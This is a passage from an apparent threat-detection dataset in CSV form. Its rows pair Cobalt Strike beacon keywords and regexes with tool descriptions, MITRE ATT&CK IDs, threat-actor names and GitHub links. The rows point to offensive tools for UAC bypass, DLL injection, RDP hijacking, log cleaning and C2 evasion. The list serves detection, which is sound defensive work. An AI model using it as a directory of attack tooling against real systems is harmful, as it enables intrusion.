T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_register*",".{0,1000}beacon_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*beacon_funcs.c*",".{0,1000}beacon_funcs\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.h*",".{0,1000}beacon_funcs\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x64.*",".{0,1000}beacon_funcs\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x86.*",".{0,1000}beacon_funcs\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" 
"*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Beacon_GETPOST*",".{0,1000}Beacon_GETPOST.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*beacon_keys -compile geacon_sourcecode_folder*",".{0,1000}beacon_keys\s\-compile\sgeacon_sourcecode_folder.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*beacon_log_clean*",".{0,1000}beacon_log_clean.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" 
"*beacon_output_ps.cna*",".{0,1000}beacon_output_ps\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*beacon_print*",".{0,1000}beacon_print.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*BEACON_RDLL_*",".{0,1000}BEACON_RDLL_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*beacon_remote_exec_*",".{0,1000}beacon_remote_exec_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_remote_exec_method_describe*",".{0,1000}beacon_remote_exec_method_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 